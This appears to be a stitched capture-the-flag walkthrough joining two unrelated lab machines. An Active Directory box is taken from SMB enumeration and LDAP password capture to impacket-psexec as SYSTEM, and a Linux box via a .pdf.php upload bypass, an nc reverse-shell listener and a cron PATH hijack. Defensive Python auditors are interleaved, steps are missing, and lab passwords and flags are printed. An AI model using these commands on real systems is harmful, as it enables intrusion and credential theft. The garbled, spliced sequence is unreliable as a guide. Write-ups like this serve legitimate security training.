$ nmap -Pn -sCV -A -T4 -p- -oN nmap_result 10.10.11.174
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-09 13:31:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-09T13:32:36
|_ start_date: N/A
|_clock-skew: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
This shows which ports are open and the services behind them.
Now that I know the domain name, I will add it to /etc/hosts.
10.10.11.174 support.htb
Checking DNS reveals a subdomain, which I also add to /etc/hosts.
$ dig @10.10.11.174 support.htb any
;; ANSWER SECTION:
support.htb. 600 IN A 10.10.11.174
support.htb. 3600 IN NS dc.support.htb.
support.htb. 3600 IN SOA dc.support.htb. hostmaster.support.htb. 107 900 600 86400 3600
Start with SMB enumeration.
Enumerating share names reveals a share called support-tools.
$ smbclient -N -L 10.10.11.174
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
Connecting to support-tools shows several exe and zip files.
$ smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
UserInfo.exe.zip is suspicious, so I will download it.
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (48.3 KiloBytes/sec) (average 48.3 KiloBytes/sec)
Unzipping it yields an executable called UserInfo.exe.
$ ls -la
total 944
drwxrwxr-x 2 kali kali 4096 Apr 12 11:44 .
drwxrwxr-x 3 kali kali 4096 Apr 12 11:43 ..
-rw-rw-rw- 1 kali kali 99840 Mar 1 2022 CommandLineParser.dll
-rw-rw-rw- 1 kali kali 22144 Oct 22 2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 kali kali 47216 Oct 22 2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 kali kali 84608 Oct 22 2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 kali kali 64112 Oct 22 2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 kali kali 20856 Feb 19 2020 System.Buffers.dll
-rw-rw-rw- 1 kali kali 141184 Feb 19 2020 System.Memory.dll
-rw-rw-rw- 1 kali kali 115856 May 15 2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 kali kali 18024 Oct 22 2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 kali kali 25984 Feb 19 2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 kali kali 12288 May 27 2022 UserInfo.exe
-rw-rw-rw- 1 kali kali 563 May 27 2022 UserInfo.exe.config
UserInfo.exe appears to be a .NET executable.
$ file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
In the UserInfo.Services namespace, the LdapQuery class connects to LDAP through a DirectoryEntry after execution, using the password returned by getPassword().
getPassword() decrypts enc_password; let's recover the password.
Since LDAP communication is done in plain text, let’s capture the LDAP login process with Wireshark.
First, examine the commands the executable accepts. It seems that the find and user commands require an argument.
$ mono UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
-v|--verbose Verbose output
Commands:
find Find a user
user Get information about a user
Looks like we need the -username option.
$ mono UserInfo.exe user
Unable to parse command 'user' reason: Required option '-username' not found!
With -username supplied, the command runs.
$ mono UserInfo.exe user -username hello -v
[*] Getting data for hello
[-] Exception: No Such Object
Checking Wireshark, I was able to capture the LDAP authentication packets.
Looking at the data of the bindRequest packet, I could see a string that appeared to be a password. Since the following packet is a bindResponse with success, authentication with this string evidently succeeds.
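As an added example (not part of the original writeup), here is a minimal parser for the LDAPv3 BindRequest seen in the capture, together with the sensor rule a defender would derive from it: a non-anonymous simple bind on port 389 without TLS puts the password on the wire in the clear. The sample message is constructed with a placeholder DN and credential, not values from the capture, and the parser reports only the bind name and the credential length, never the credential itself.

```python
# BER tag values used by an LDAPv3 BindRequest (RFC 4511, section 4.2)
TAG_SEQUENCE = 0x30       # LDAPMessage / SEQUENCE
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_SIMPLE_AUTH = 0x80    # authentication CHOICE: simple [0] OCTET STRING
TAG_SASL_AUTH = 0xA3      # authentication CHOICE: sasl [3] SEQUENCE


def _tlv(tag, content):
    """Encode one BER tag-length-value (definite length, short or long form)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + content


def _read_tlv(buf, pos):
    """Decode the TLV at buf[pos]; return (tag, content, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(message_id, name, password):
    """Encode an LDAPv3 simple BindRequest the way a client puts it on the wire."""
    op = (_tlv(TAG_INTEGER, bytes([3]))                 # version 3
          + _tlv(TAG_OCTET_STRING, name.encode())       # bind DN / user name
          + _tlv(TAG_SIMPLE_AUTH, password.encode()))   # cleartext credential
    return _tlv(TAG_SEQUENCE,
                _tlv(TAG_INTEGER, bytes([message_id])) + _tlv(TAG_BIND_REQUEST, op))


def parse_bind_request(msg):
    """Summarise a BindRequest; return None if msg is some other LDAP operation.
    The credential itself is deliberately not returned, only its length."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, mid, pos = _read_tlv(body, 0)
    tag, op, _ = _read_tlv(body, pos)
    if tag != TAG_BIND_REQUEST:
        return None
    _, ver, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, cred, _ = _read_tlv(op, pos)
    mech = {TAG_SIMPLE_AUTH: "simple", TAG_SASL_AUTH: "sasl"}.get(auth_tag, "unknown")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "name": name.decode(errors="replace"),
        "auth": mech,
        "credential_length": len(cred) if mech == "simple" else 0,
    }


def assess_bind(msg, dst_port, tls):
    """Sensor rule: a non-anonymous simple bind that is not protected by TLS
    exposes the password in cleartext. Returns an alert string or None."""
    info = parse_bind_request(msg)
    if info is None or info["auth"] != "simple" or info["credential_length"] == 0:
        return None
    if tls or dst_port == 636:
        return None
    return (f"cleartext simple bind: msgid={info['message_id']} "
            f"name={info['name']!r} password_len={info['credential_length']}")


# Constructed sample: placeholder DN and credential, not values from the capture
SAMPLE_BIND = build_simple_bind(1, "CN=ldapuser,CN=Users,DC=example,DC=com", "constructed-secret")

if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_BIND))
    print(assess_bind(SAMPLE_BIND, dst_port=389, tls=False))   # alert
    print(assess_bind(SAMPLE_BIND, dst_port=636, tls=True))    # None: protected
```

The same parser applied to the capture would show why Wireshark can display the password: a simple bind is an OCTET STRING with no protection beyond whatever the transport adds, so the mitigation is to require LDAPS or LDAP signing rather than to hide the credential better inside the client binary.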
Checking the results, I found a password-like string in the info attribute.
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
(omitted)
info: Ironside47pleasure40Watchful
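The info attribute is one of several free-text fields (description and comment are others) that administrators sometimes use to stash credentials, and all of them are readable by any authenticated domain user. As an added example that is not part of the writeup, here is a small LDIF parser and audit pass that flags password-like values in those attributes. The LDIF sample is constructed with placeholder entries and values (it only mimics the shape of the output above), and the report deliberately omits the flagged values themselves.

```python
import base64
import re

# Constructed LDIF sample: shaped like the ldapsearch output above, but every DN
# and value here is a placeholder invented for this example.
SAMPLE_LDIF = """\
# helpdesk, Users, example.com
dn: CN=helpdesk,CN=Users,DC=example,DC=com
objectClass: top
objectClass: person
objectClass: user
cn: helpdesk
description: Helpdesk contact, ext. 4410
info: Constructed7temporary9Value

# svc-backup, Users, example.com
dn: CN=svc-backup,CN=Users,DC=example,DC=com
objectClass: user
cn: svc-backup
comment:: QmFja3VwIGFjY291bnQ=
description: Backup job account; temp pwd = see vault

# printer, Users, example.com
dn: CN=printer,CN=Users,DC=example,DC=com
cn: printer
info: see ticket 1234 fo
 r details
"""

# Free-text attributes that people stuff secrets into; readable by any authenticated user
ATTRS_TO_REVIEW = ("info", "description", "comment", "notes")
# A single token of 10+ characters mixing upper, lower and digits looks like a password
PASSWORD_LIKE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)\S{10,}$")
CREDENTIAL_KEYWORD = re.compile(r"\b(pass(?:word|wd)?|pwd|pw)\s*[:=]", re.I)


def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts. Handles folded lines
    (a continuation line starts with one space), base64 values ('::') and comments."""
    entries, current, pending = [], {}, []

    def flush():
        if not pending:
            return
        line = "".join(pending)
        pending.clear()
        if line.startswith("#"):
            return
        attr, sep, value = line.partition(":")
        if not sep:
            return
        if value.startswith(":"):   # "attr:: base64value"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", errors="replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip().lower(), []).append(value)

    for raw in text.splitlines():
        if raw.startswith(" "):      # folded continuation of the previous line
            pending.append(raw[1:])
            continue
        flush()
        if raw == "":                # blank line ends the entry
            if current:
                entries.append(current)
                current = {}
            continue
        pending.append(raw)
    flush()
    if current:
        entries.append(current)
    return entries


def find_credential_like_attributes(entries):
    """Return (dn, attribute, reason) for suspicious values; the values are not echoed."""
    findings = []
    for entry in entries:
        dn = entry.get("dn", ["?"])[0]
        for attr in ATTRS_TO_REVIEW:
            for value in entry.get(attr, []):
                if PASSWORD_LIKE.match(value):
                    findings.append((dn, attr, "password-like token"))
                elif CREDENTIAL_KEYWORD.search(value):
                    findings.append((dn, attr, "credential keyword"))
    return findings


if __name__ == "__main__":
    for dn, attr, reason in find_credential_like_attributes(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}: attribute '{attr}' -> {reason}")
```

Run it over an ldapsearch export of the Users container on a schedule; each finding is a credential to rotate and an attribute to clear.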
Since port 5985 is open, connecting with WinRM succeeded.
Decode the saved base64 and save it as ticket.kirbi.
$ base64 -d ticket.kirbi.b64 > ticket.kirbi
Finally, convert the ticket to a format that impacket can use.
$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
Use the ticket with psexec to get a shell. I obtained a shell as the SYSTEM account.
$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mYVFUPYN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service Tztr on dc.support.htb.....
[*] Starting service Tztr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
I was able to get the root flag from C:\Users\Administrator\Desktop\root.txt.
C:\Windows\system32> more C:\Users\Administrator\Desktop\root.txt
ba27ef32c706d15469541c11c323dd49
The original process appears to be a function that checks whether the file is a .pdf and uploads it to /cvs. In this case, the attacker would have bypassed the extension check by uploading a file with a name ending in .pdf.php: since PHP is running on the server, it is likely that the attacker uploaded a PHP reverse shell.
Predicting what the attacker would have uploaded, I scan /cvs for .pdf.php files.
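The double-extension trick works against checks that look at the wrong part of the filename. As an added example, not the server's handler (which is PHP and is not shown on this page), here is a Python sketch of a naive check that shell.pdf.php passes beside a hardened one that decides on the last extension only, allows exactly one extension, strips directory components, rejects control characters, checks the %PDF- magic bytes and stores the file under a server-generated name. naive_is_pdf is a hypothetical reconstruction of the kind of test the handler must have used.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {"pdf"}
PDF_MAGIC = b"%PDF-"


def naive_is_pdf(filename):
    """Hypothetical reconstruction of a check that 'shell.pdf.php' passes: it only
    asks whether '.pdf' occurs somewhere in the name."""
    return ".pdf" in filename.lower()


def validate_upload(filename, content):
    """Hardened check. Returns (accepted, reason)."""
    # 1. Drop any directory part the client sent; only the basename matters.
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or any(ord(c) < 0x20 for c in base):
        return False, "empty, traversal or control-character name"
    # 2. Decide on the LAST extension only, and allow exactly one extension.
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem:
        return False, "no extension"
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    if "." in stem:
        return False, "multiple extensions not allowed"
    # 3. Trust the content, not the name: a PDF starts with %PDF-.
    if not content.startswith(PDF_MAGIC):
        return False, "content is not a PDF"
    return True, "ok"


def safe_storage_name(ext="pdf"):
    """Never store under the client-chosen name; generate one server-side."""
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: a fake PHP file and a minimal PDF header
    for name, data in [("shell.pdf.php", b"<?php\n"),
                       ("shell.php.pdf", b"%PDF-1.7\n"),
                       ("../../report.pdf", b"%PDF-1.7\n"),
                       ("report.pdf", b"<?php\n")]:
        print(f"{name:20} naive={naive_is_pdf(name)!s:5} hardened={validate_upload(name, data)}")
```

Even with the hardened check, the upload directory should be served without script execution (no handler for .php under /cvs), so that a second mistake in the validator does not become code execution.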
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42840
ls
index.html
shell.pdf.php
You can get the flag from /home/lachlan/user.txt:
/home/lachlan/user.txt
thm{af7e46b68081d4025c5ce10851430617}
A. thm{af7e46b68081d4025c5ce10851430617}
Q2. What is the proof.txt flag?
Hint. … and a bit sloppy in their automated kill scripts.
Checking /home/lachlan/.bash_history, you find that lachlan's password is thisistheway123.
./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history
However, when I connected over SSH, I was able to log in, but the connection was closed after a few seconds.
$ ssh lachlan@10.10.222.254
lachlan@10.10.222.254's password:
Last login: Thu May 5 04:39:19 2022 from 192.168.56.1
$ pwdnope
Connection to 10.10.222.254 closed.
If you check /etc/cron.d/persistence, the script found in /home/lachlan/.bash_history, you can see that it is what kills the process.
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
Looking at the commands with PATH=/home/lachlan/bin:/bin:/usr/bin, you can see that commands are resolved in order along PATH, which starts with /home/lachlan/bin, but pkill is not given as an absolute path. If you create a pkill file in /home/lachlan/bin, /home/lachlan/bin/pkill will be executed.
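The fix is to give every command in a root cron job an absolute path and to keep user-writable directories out of PATH. As an added example, not part of the writeup, here is a small auditor in Python that parses a /etc/cron.d file, tracks its PATH line, and flags commands that cron will resolve through PATH, reporting the search order and which of those directories a non-root user could plausibly write to. The sample input is the persistence file shown above; the keyword handling is a heuristic for cron one-liners, not a full shell parser.

```python
import re

# Sample input: the /etc/cron.d/persistence file shown above (copied from the writeup)
SAMPLE_CRON = """\
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
"""

# Words that sit in front of a command without being one, and segment starts that hold no command
PREFIX_WORDS = {"do", "then", "else", "!", "{", "("}
NON_COMMAND_FIRST = {"for", "in", "done", "fi", "esac", "}", ")"}
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
SEPARATORS = re.compile(r"&&|\|\||;|\||`|\$\(|\)")
# Directories a non-root user can plausibly write to; these jobs run as root
UNTRUSTED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
DEFAULT_CRON_PATH = ["/usr/bin", "/bin"]   # what cron uses when the file sets no PATH


def command_words(command):
    """Yield the first word of each simple command in a cron command string.
    Heuristic tokenizer for cron one-liners, not a full shell grammar."""
    for segment in SEPARATORS.split(command):
        tokens = segment.split()
        while tokens and (tokens[0] in PREFIX_WORDS or ASSIGNMENT.match(tokens[0])):
            tokens.pop(0)
        if not tokens or tokens[0] in NON_COMMAND_FIRST:
            continue
        yield tokens[0]


def audit_cron_d(text):
    """Flag every command cron would resolve through PATH (a bare name with no '/'),
    with the PATH search order and the directories in it that look user-writable."""
    path_dirs = list(DEFAULT_CRON_PATH)
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        env = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$", line)
        if env:                                 # environment line such as PATH=...
            if env.group(1) == "PATH":
                path_dirs = env.group(2).strip("\"'").split(":")
            continue
        # /etc/cron.d format: five schedule fields (or one @keyword), the user, then the command
        fields = 1 if line.startswith("@") else 5
        parts = line.split(None, fields + 1)
        if len(parts) < fields + 2:
            continue
        for word in command_words(parts[-1]):
            if "/" in word:
                continue                        # explicit path: not resolved through PATH
            findings.append({
                "line": lineno,
                "command": word,
                "search_order": list(path_dirs),
                "untrusted_dirs": [d for d in path_dirs if d.startswith(UNTRUSTED_PREFIXES)],
            })
    return findings


if __name__ == "__main__":
    for f in audit_cron_d(SAMPLE_CRON):
        print(f"line {f['line']}: '{f['command']}' resolved via {':'.join(f['search_order'])}"
              f" -> user-writable first: {f['untrusted_dirs']}")
```

On the file above it reports pkill on each of the six job lines, resolved first through /home/lachlan/bin, which is exactly the condition that makes the hijack possible; the same pass over every file in /etc/cron.d and /etc/crontab is a cheap periodic check.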